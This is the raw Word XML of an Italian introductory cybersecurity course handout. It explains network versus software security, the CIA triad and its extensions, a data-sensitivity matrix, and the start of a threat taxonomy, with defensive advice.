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5" w:name="modulo-m1-fondamenti-di-cybersecurity"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modulo M1 — Fondamenti di Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dispensa Tecnica — Corso ITS Cybersecurity (32h)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modulo 1 — 4 ore (3h teoria + 1h lab a coppie)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prerequisiti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nessuno. M0 completato (ambiente funzionante).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo materiale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">integra e adatta a 4h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il Capitolo 1 della dispensa principale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dispensa-sviluppo-sicuro-software.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aggiunge: CIA Triad estesa, tassonomia minacce strutturata, 5 casi reali raccontati come storie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="54" w:name="indice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1 — Sicurezza informatica vs sicurezza del software</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 2 — La CIA Triad (e i suoi 3 fratelli)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3 — Tassonomia delle minacce</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 4 — Cinque casi reali</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5 — La mentalità avversaria</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6 — I 5 principi del Secure Coding</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="cap7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 7 — Lab — Cosa è andato storto?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1 — Sicurezza informatica vs sicurezza del software</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 30 minuti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="18" w:name="X9be05246816c750a589beaffe552e485819bd89"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Due cose diverse che la stampa chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“cybersecurity”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando il telegiornale dice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“attacco hacker a una banca”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, potrebbe parlare di due cose molto diverse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Caso A — Sicurezza informatica (perimetrale, infrastrutturale)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’attaccante entra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dalla rete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sfrutta firewall mal configurati, VPN bucate, server esposti, password deboli su SSH, accessi RDP non protetti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chi previene:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sistemisti, amministratori di rete, responsabili IT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Caso B — Sicurezza del software (applicazioni, codice)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’attaccante non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“entra”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— manda una richiesta legittima all’applicazione, ma con dati malevoli. Es: una SQL Injection nel form di login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chi previene:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sviluppatori, architetti software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="perché-distinguerle"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Perché distinguerle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confonderle porta a errori sistematici:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Abbiamo il firewall, siamo a posto.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Falso. Il firewall protegge dal Caso A. Una SQL Injection passa dal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">firewall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che la fa passare perché è una richiesta HTTP legittima sulla porta 443. Lo SQLi entra nell’app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">attraverso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la porta che il firewall lascia aperta apposta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Abbiamo HTTPS, siamo a posto.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Falso. HTTPS cifra il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">canale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se l’app dentro è vulnerabile a SQL Injection, l’attaccante manda l’attacco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">cifrato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e funziona uguale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:id="20" w:name="questo-corso-parla-di-entrambe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Questo corso parla di entrambe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In 32 ore tocchiamo entrambi i fronti, ma con questa proporzione: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333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Sicurezza informatica (rete, protocolli, OS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">M2, parte di M5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~7h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Sicurezza del software (codice, applicazioni)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">M3, M5, M6, M7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~18h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Trasversale (concetti, normativa)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">M1, M4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~6h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La maggior parte del tempo è sul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Perché è dove i discenti — futuri sviluppatori — possono fare la differenza.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2 — La CIA Triad (e i suoi 3 fratelli)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 30 minuti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="cosè-essere-sicuri"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Cos’è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“essere sicuri”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In informatica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“sicurezza”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non è un’unica cosa. È la conservazione di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">proprietà</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">misurabili. Le 3 fondamentali si chiamano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CIA Triad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 — Confidentiality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Riservatezza)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I dati sono visibili solo a chi è autorizzato.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Violazione: estrazione DB, sniffing, accesso non autorizzato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">I — Integrity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Integrità)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I dati non sono modificati senza autorizzazione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Violazione: manomissione di un cookie, alterazione di un bonifico, modifica di un log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A — Availability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Disponibilità)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il sistema è disponibile quando serve.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Violazione: DDoS, ransomware, blackout.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="esempi-concreti-per-ogni-proprietà"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Esempi concreti per ogni proprietà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60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Proprietà violata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Equifax 2017 — 147M record rubati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(Confidentiality)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Bonifico modificato in transito (MITM)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 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Integrity)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WannaCry 2017 — ospedali UK bloccati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(Availability)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Phishing → password rubata → login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(perché ora l’attaccante vede dati)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Defacing di un sito (homepage modificata)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 flood che mette KO un server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</w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="i-3-fratelli-estensione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 I 3 fratelli (estensione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CIA è la triade classica del 1986. Negli anni si sono aggiunti 3 concetti che oggi sono altrettanto importanti:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Autenticità)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’identità dichiarata è verificabile. Sei davvero tu?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Non-repudiation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Non-ripudio)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chi ha fatto un’azione non può negarla dopo. Hai firmato il bonifico, non puoi dire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“non sono stato io”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Accountability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Responsabilità tracciabile)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le azioni sono tracciate e attribuibili. C’è un audit trail.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="quando-applicare-cia-la-matrice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Quando applicare CIA: la matrice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A design time, per ogni tipologia di dato, chiediti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">quale proprietà conta di più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Saldo conto corrente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🔥 alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🔥 alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🔥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utenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🔥 critica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🔥 critica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bassa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di sistema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🔥 critica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 pubblica</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“chi siamo”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bassa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🔥 critica (defacing)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Catalogo prodotti e-commerce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bassa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🔥 critica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa matrice (anche grezza) ti aiuta a capire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dove investire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in sicurezza.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3 — Tassonomia delle minacce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 45 minuti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="33" w:name="le-8-categorie-di-minacce"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Le 8 categorie di minacce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per non perdersi, raggruppiamo le minacce in 8 categorie. Per ognuna: cos’è, esempio, chi/cosa la previene.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="malware"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Malware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Software dannoso che gira sulla macchina vittima. Sotto-categorie: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Virus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: si attacca a file legittimi e si propaga eseguendoli.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Worm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: si propaga da solo via rete senza interazione utente.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Trojan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: si traveste da software legittimo.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Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: cifra i file e chiede riscatto. Casi: WannaCry 2017, NotPetya 2017, Colonial Pipeline 2021.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Spyware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ruba dati silenziosamente. Casi: Pegasus.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Rootkit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: si nasconde nel kernel del sistema operativo.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Botnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: malware che mette il PC infettato sotto controllo remoto, spesso per attacchi DDoS coordinati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa primaria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: antivirus aggiornato,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">non eseguire allegati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sospetti, EDR/XDR aziendali, patching.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="phishing-e-social-engineering"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Phishing e Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaccante ti convince a fare qualcosa che non dovresti. Tecnologia minimale,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">psicologia massimale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sotto-categorie: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Phishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: email che imita una banca/servizio per rubare password.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Spear phishing</w:t>
      </w:r>
      <w:r>
